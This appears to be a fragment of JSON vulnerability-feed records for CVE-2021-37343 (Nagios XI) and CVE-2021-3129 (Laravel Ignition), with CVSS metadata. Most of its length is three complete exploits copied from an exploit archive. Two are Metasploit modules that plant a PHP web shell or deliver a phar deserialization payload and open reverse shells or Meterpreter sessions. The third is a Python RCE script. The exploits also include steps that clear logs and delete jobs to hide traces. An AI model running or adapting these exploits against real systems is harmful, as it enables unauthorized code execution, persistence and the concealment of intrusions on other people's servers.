"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T12:15:00", "type": "prion", "title": "CVE-2021-37343", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37343"], "modified": "2022-02-22T14:30:00", "id": "PRION:CVE-2021-37343", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-37343", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T04:53:07", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T15:15:00", "type": "prion", "title": "CVE-2021-3129", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-22T10:15:00", "id": "PRION:CVE-2021-3129", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-3129", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2022-11-05T08:30:35", "description": "Nagios XI is a commercial monitoring solution built on Nagios Core, including dashboards, web-based configuration, advanced reporting, and rich data visualization.A path traversal vulnerability exists in the AutoDiscovery component in versions of Nagios XI prior to 5.8.5. An attacker could exploit this vulnerability to achieve remote code execution in the security context of a user running Nagios.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T00:00:00", "type": "cnvd", "title": "Nagios XI path traversal vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37343"], "modified": "2021-11-25T00:00:00", "id": "CNVD-2021-90915", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-90915", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-05-24T12:24:52", "description": "This Metasploit module exploits a path traversal issue in Nagios XI before version 5.8.5. The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as www-data. The module achieves this by creating an autodiscovery job with an id field containing a path traversal to a writable and remotely accessible directory, and custom_ports field containing the web shell. A cron file will be created using the chosen path and file name, and the web shell is embedded in the file. After the web shell has been written to the victim, this module will then use the web shell to establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the autodiscovery job is removed as well.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T00:00:00", "type": "zdt", "title": "Nagios XI Autodiscovery Shell Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37343"], "modified": "2022-02-14T00:00:00", "id": "1337DAY-ID-37354", "href": "https://0day.today/exploit/description/37354", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::NagiosXi\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Nagios XI Autodiscovery Webshell Upload',\n 'Description' => %q{\n This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343).\n The path traversal allows a remote and authenticated administrator to upload a PHP web shell\n and execute code as `www-data`. The module achieves this by creating an autodiscovery job\n with an `id` field containing a path traversal to a writable and remotely accessible directory,\n and `custom_ports` field containing the web shell. A cron file will be created using the chosen\n path and file name, and the web shell is embedded in the file.\n\n After the web shell has been written to the victim, this module will then use the web shell to\n establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by\n the module, and the autodiscovery job is removed as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Claroty Team82', # vulnerability discovery\n 'jbaines-r7' # metasploit module\n ],\n 'References' => [\n ['CVE', '2021-37343'],\n ['URL', 'https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/']\n ],\n 'DisclosureDate' => '2021-07-15',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl'\n },\n 'Payload' => {\n 'Append' => ' & disown'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'printf' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options [\n OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),\n OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),\n OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),\n OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),\n OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])\n ]\n\n @webshell_uri = '/includes/components/highcharts/exporting-server/temp/'\n @webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/'\n end\n\n # Authenticate and grab the version from the dashboard. Store auth cookies for later user.\n def check\n login_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false)\n case login_result\n when 1..3 # An error occurred\n return CheckCode::Unknown(res_array[0])\n when 4\n return CheckCode::Detected('Nagios is not fully installed.')\n when 5\n return CheckCode::Detected('The Nagios license has not been signed.')\n end\n\n # res_array[1] cannot be nil since the mixin checks for that already.\n @auth_cookies = res_array[1]\n\n nagios_version = nagios_xi_version(res_array[0])\n if nagios_version.nil?\n return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')\n end\n\n # affected versions are 5.2.0 -> 5.8.4\n if Rex::Version.new(nagios_version) < Rex::Version.new('5.8.5') &&\n Rex::Version.new(nagios_version) >= Rex::Version.new('5.2.0')\n return CheckCode::Appears(\"Determined using the self-reported version: #{nagios_version}\")\n end\n\n CheckCode::Safe(\"Determined using the self-reported version: #{nagios_version}\")\n end\n\n # Using the path traversal, upload a php webshell to the remote target\n def drop_webshell\n autodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/')\n print_status(\"Attempting to grab a CSRF token from #{autodisc_uri}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => autodisc_uri,\n 'cookie' => @auth_cookies,\n 'vars_get' => {\n 'mode' => 'newjob'\n }\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Unexpected HTTP body') unless res.body.include?('<title>New Auto-Discovery Job')\n\n # snag the nsp token from the response\n nsp = get_nsp(res)\n fail_with(Failure::Unknown, 'Failed to obtain the nsp token which is required to upload the web shell') if nsp.blank?\n\n # drop a basic web shell on the server\n webshell_location = normalize_uri(target_uri.path, \"#{@webshell_uri}#{@webshell_name}\")\n print_status(\"Uploading webshell to #{webshell_location}\")\n php_webshell = '<?php if(isset($_GET[\"cmd\"])) { system($_GET[\"cmd\"]); } ?>'\n payload = 'update=1&' \\\n \"job=#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}&\" \\\n \"nsp=#{nsp}&\" \\\n 'address=127.0.0.1%2F0&' \\\n 'frequency=Yearly&' \\\n \"custom_ports=#{php_webshell}&\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => autodisc_uri,\n 'cookie' => @auth_cookies,\n 'vars_get' => {\n 'mode' => 'newjob'\n },\n 'data' => payload\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 302\n\n # Test the web shell installed by echoing a random string and ensure it appears in the res.body\n print_status('Testing if web shell installation was successful')\n rand_data = Rex::Text.rand_text_alphanumeric(16..32)\n res = execute_via_webshell(\"echo #{rand_data}\")\n fail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data)\n print_good(\"Web shell installed at #{webshell_location}\")\n\n # This is a great place to leave a web shell for persistence since it doesn't require auth\n # to touch it. By default, we'll clean this up but the attacker has to option to leave it\n if datastore['DELETE_WEBSHELL']\n register_file_for_cleanup(\"#{@webshell_path}#{@webshell_name}\")\n end\n end\n\n # Successful exploitation creates a new job in the autodiscovery view. This function deletes\n # the job that there is no evidence of exploitation in the UI.\n def cleanup_job\n print_status('Deleting autodiscovery job')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/includes/components/autodiscovery/'),\n 'cookie' => @auth_cookies,\n 'vars_get' => {\n 'mode' => 'deletejob',\n 'job' => \"#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}\"\n }\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res&.code == 302\n end\n\n # Executes commands via the uploaded webshell\n def execute_via_webshell(cmd)\n cmd = Rex::Text.uri_encode(cmd)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/includes/components/highcharts/exporting-server/temp/#{@webshell_name}?cmd=#{cmd}\")\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 200\n res\n end\n\n def execute_command(cmd, _opts = {})\n execute_via_webshell(cmd)\n end\n\n def exploit\n # create a randomish web shell name if the user doesn't specify one\n @webshell_name = datastore['WEBSHELL_NAME'] || \"#{Rex::Text.rand_text_alpha(5..12)}.php\"\n\n drop_webshell\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n ensure\n cleanup_job\n end\nend\n", "sourceHref": "https://0day.today/exploit/37354", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-10-12T23:18:34", "description": "Ignition versions prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel versions prior to 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-07T00:00:00", "type": "zdt", "title": "Ignition 2.5.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-04-07T00:00:00", "id": "1337DAY-ID-36079", "href": "https://0day.today/exploit/description/36079", "sourceData": "# Exploit Title: Laravel debug mode Remote Code Execution (Ignition <= 2.5.1)\r\n# Exploit Author: Tobias Marcotto\r\n# Tested on: Kali Linux x64\r\n# Version: < 2.5.1\r\n# Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.\r\n# CVE : CVE-2021-3129\r\n\r\n\r\n*********************************************************************************************************\r\n\r\n\r\n#!/usr/bin/env python3.7\r\n\r\nimport base64\r\nimport re\r\nimport sys\r\nfrom dataclasses import dataclass\r\n\r\nimport requests\r\n\r\n\r\n@dataclass\r\nclass Exploit:\r\n session: requests.Session\r\n url: str\r\n payload: bytes\r\n log_path: str\r\n\r\n def main(self):\r\n if not self.log_path:\r\n self.log_path = self.get_log_path()\r\n \r\n try:\r\n self.clear_logs()\r\n self.put_payload()\r\n self.convert_to_phar()\r\n self.run_phar()\r\n finally:\r\n self.clear_logs()\r\n\r\n def success(self, message, *args):\r\n print('+ ' + message.format(*args))\r\n\r\n def failure(self, message, *args):\r\n print('- ' + message.format(*args))\r\n exit()\r\n\r\n def get_log_path(self):\r\n r = self.run_wrapper('DOESNOTEXIST')\r\n match = re.search(r'\"file\":\"(\\\\/[^\"]+?)\\\\/vendor\\\\/[^\"]+?\"', r.text)\r\n if not match:\r\n self.failure('Unable to find full path')\r\n path = match.group(1).replace('\\\\/', '/')\r\n path = f'{path}/storage/logs/laravel.log'\r\n r = self.run_wrapper(path)\r\n if r.status_code != 200:\r\n self.failure('Log file does not exist: {}', path)\r\n\r\n self.success('Log file: {}', path)\r\n return path\r\n \r\n def clear_logs(self):\r\n wrapper = f'php://filter/read=consumed/resource={self.log_path}'\r\n self.run_wrapper(wrapper)\r\n self.success('Logs cleared')\r\n return True\r\n\r\n def get_write_filter(self):\r\n filters = '|'.join((\r\n 'convert.quoted-printable-decode',\r\n 'convert.iconv.utf-16le.utf-8',\r\n 'convert.base64-decode'\r\n ))\r\n return f'php://filter/write={filters}/resource={self.log_path}'\r\n\r\n def run_wrapper(self, wrapper):\r\n solution = \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\"\r\n return self.session.post(\r\n self.url + '/_ignition/execute-solution/',\r\n json={\r\n \"solution\": solution,\r\n \"parameters\": {\r\n \"viewFile\": wrapper,\r\n \"variableName\": \"doesnotexist\"\r\n }\r\n }\r\n )\r\n\r\n def put_payload(self):\r\n payload = self.generate_payload()\r\n # This garanties the total log size is even\r\n self.run_wrapper(payload)\r\n self.run_wrapper('AA')\r\n\r\n def generate_payload(self):\r\n payload = self.payload\r\n payload = base64.b64encode(payload).decode().rstrip('=')\r\n payload = ''.join(c + '=00' for c in payload)\r\n # The payload gets displayed twice: use an additional '=00' so that\r\n # the second one does not have the same word alignment\r\n return 'A' * 100 + payload + '=00'\r\n\r\n def convert_to_phar(self):\r\n wrapper = self.get_write_filter()\r\n r = self.run_wrapper(wrapper)\r\n if r.status_code == 200:\r\n self.success('Successfully converted to PHAR !')\r\n else:\r\n self.failure('Convertion to PHAR failed (try again ?)')\r\n\r\n def run_phar(self):\r\n wrapper = f'phar://{self.log_path}/test.txt'\r\n r = self.run_wrapper(wrapper)\r\n if r.status_code != 500:\r\n self.failure('Deserialisation failed ?!!')\r\n self.success('Phar deserialized')\r\n # We might be able to read the output of system, but if we can't, it's ok\r\n match = re.search('^(.*?)\\n<!doctype html>\\n<html class=\"', r.text, flags=re.S)\r\n\r\n if match:\r\n print('--------------------------')\r\n print(match.group(1))\r\n print('--------------------------')\r\n elif 'phar error: write operations' in r.text:\r\n print('Exploit succeeded')\r\n else:\r\n print('Done')\r\n\r\n\r\ndef main(url, payload, log_path=None):\r\n payload = open(payload, 'rb').read()\r\n session = requests.Session()\r\n #session.proxies = {'http': 'localhost:8080'}\r\n exploit = Exploit(session, url.rstrip('/'), payload, log_path)\r\n exploit.main()\r\n\r\n\r\nif len(sys.argv) <= 1:\r\n print(\r\n f'Usage: {sys.argv[0]} <url> </path/to/exploit.phar> [log_file_path]\\n'\r\n '\\n'\r\n 'Generate your PHAR using PHPGGC, and add the --fast-destruct flag if '\r\n 'you want to see your command\\'s result. The Monolog/RCE1 GC works fine.\\n\\n'\r\n 'Example:\\n'\r\n ' $ php -d\\'phar.readonly=0\\' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id\\n'\r\n ' $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar\\n'\r\n )\r\n exit()\r\n\r\nmain(sys.argv[1], sys.argv[2], (len(sys.argv) > 3 and sys.argv[3] or None))\n\n# 0day.today [2021-10-13] #", "sourceHref": "https://0day.today/exploit/36079", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:36", "description": "Ignition versions prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T00:00:00", "type": "zdt", "title": "Ignition Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-17T00:00:00", "id": "1337DAY-ID-37366", "href": "https://0day.today/exploit/description/37366", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Unauthenticated remote code execution in Ignition',\n 'Description' => %q{\n Ignition before 2.5.2, as used in Laravel and other products,\n allows unauthenticated remote attackers to execute arbitrary code\n because of insecure usage of file_get_contents() and file_put_contents().\n This is exploitable on sites using debug mode with Laravel before 8.4.2.\n },\n 'Author' => [\n 'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging\n 'ambionics' # discovered\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2021-3129'],\n ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']\n ],\n 'DisclosureDate' => '2021-01-13',\n 'Platform' => %w[unix linux macos win],\n 'Targets' => [\n [\n 'Unix (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n [\n 'Windows (In-Memory)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']),\n OptString.new('LOGFILE', [false, 'Laravel log file absolute path'])\n ])\n end\n\n def check\n print_status(\"Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'method' => 'PUT'\n }, 1)\n # Check whether it is using facade/ignition\n # If is using it should respond method not allowed\n # checking if debug mode is enable\n if res && res.code == 405 && res.body.match(/label:\"(Debug)\"/)\n vprint_status 'Debug mode is enabled.'\n # check version\n versions = JSON.parse(\n res.body.match(/.+\"report\":(\\{.*),\"exception_class/).captures.first.gsub(/$/, '}')\n )\n version = Rex::Version.new(versions['framework_version'])\n vprint_status \"Found PHP #{versions['language_version']} running Laravel #{version}\"\n # to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid)\n # but it is way more intrusive than just checking the version moreover we would need to call\n # the find_log_file method before, meaning four requests more.\n return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n @logfile = datastore['LOGFILE'] || find_log_file\n fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile\n\n clear_log\n put_payload\n convert_to_phar\n run_phar\n\n handler\n\n clear_log\n end\n\n def find_log_file\n vprint_status 'Trying to detect log file'\n res = post Rex::Text.rand_text_alpha_upper(12)\n if res.code == 500 && res.body.match(%r{\"file\":\"(\\\\/[^\"]+?)/vendor\\\\/[^\"]+?})\n logpath = Regexp.last_match(1).gsub(/\\\\/, '')\n vprint_status \"Found directory candidate #{logpath}\"\n logfile = \"#{logpath}/storage/logs/laravel.log\"\n vprint_status \"Checking if #{logfile} exists\"\n res = post logfile\n if res.code == 200\n vprint_status \"Found log file #{logfile}\"\n return logfile\n end\n vprint_error \"Log file does not exist #{logfile}\"\n return\n end\n vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'\n return\n end\n\n def clear_log\n res = post \"php://filter/read=consumed/resource=#{@logfile}\"\n # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true)\n fail_with(Failure::UnexpectedReply, \"Log file #{@logfile} doesn't seem to exist.\") unless res.code == 200\n end\n\n def put_payload\n post format_payload\n post Rex::Text.rand_text_alpha_upper(2)\n end\n\n def convert_to_phar\n filters = %w[\n convert.quoted-printable-decode\n convert.iconv.utf-16le.utf-8\n convert.base64-decode\n ].join('|')\n\n post \"php://filter/write=#{filters}/resource=#{@logfile}\"\n end\n\n def run_phar\n post \"phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt\"\n # resp.body.match(%r{^(.*)\\n<!doctype html>})\n # $1 ? print_good($1) : nil\n end\n\n def body_template(data)\n {\n solution: 'Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution',\n parameters: {\n viewFile: data,\n variableName: Rex::Text.rand_text_alpha_lower(4..12)\n }\n }.to_json\n end\n\n def post(data)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'method' => 'POST',\n 'data' => body_template(data),\n 'ctype' => 'application/json',\n 'headers' => {\n 'Accept' => '*/*',\n 'Accept-Encoding' => 'gzip, deflate'\n }\n })\n end\n\n def generate_phar(pop)\n file = Rex::Text.rand_text_alpha_lower(8)\n stub = \"<?php __HALT_COMPILER(); ?>\\r\\n\"\n file_contents = Rex::Text.rand_text_alpha_lower(20)\n file_crc32 = Zlib.crc32(file_contents) & 0xffffffff\n manifest_len = 40 + pop.length + file.length\n phar = stub\n phar << [manifest_len].pack('V') # length of manifest in bytes\n phar << [0x1].pack('V') # number of files in the phar\n phar << [0x11].pack('v') # api version of the phar manifest\n phar << [0x10000].pack('V') # global phar bitmapped flags\n phar << [0x0].pack('V') # length of phar alias\n phar << [pop.length].pack('V') # length of phar metadata\n phar << pop # pop chain\n phar << [file.length].pack('V') # length of filename in the archive\n phar << file # filename\n phar << [file_contents.length].pack('V') # length of the uncompressed file contents\n phar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970.\n phar << [file_contents.length].pack('V') # length of the compressed file contents\n phar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents\n phar << [0x1b6].pack('V') # bit-mapped file-specific flags\n phar << [0x0].pack('V') # serialized File Meta-data length\n phar << file_contents # serialized File Meta-data\n phar << [Rex::Text.sha1(phar)].pack('H*') # signature\n phar << [0x2].pack('V') # signiture type\n phar << 'GBMB' # signature presence\n\n return phar\n end\n\n def format_payload\n # rubocop:disable Style/StringLiterals\n serialize = \"a:2:{i:7;O:31:\\\"GuzzleHttp\\\\Cookie\\\\FileCookieJar\\\"\"\n serialize << \":1:{S:41:\\\"\\\\00GuzzleHttp\\\\5cCookie\\\\5cFileCookieJar\\\\00filename\\\";\"\n serialize << \"O:38:\\\"Illuminate\\\\Validation\\\\Rules\\\\RequiredIf\\\"\"\n serialize << \":1:{S:9:\\\"condition\\\";a:2:{i:0;O:20:\\\"PhpOption\\\\LazyOption\\\"\"\n serialize << \":2:{S:30:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00callback\\\";\"\n serialize << \"S:6:\\\"system\\\";S:31:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00arguments\\\";\"\n serialize << \"a:1:{i:0;S:#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}}i:1;S:3:\\\"get\\\";}}}i:7;i:7;}\"\n # rubocop:enable Style/StringLiterals\n phar = generate_phar(serialize)\n\n b64_gadget = Base64.strict_encode64(phar).gsub('=', '')\n payload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join\n\n return Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00'\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37366", "cvss": {"score": 7.5, "vector": 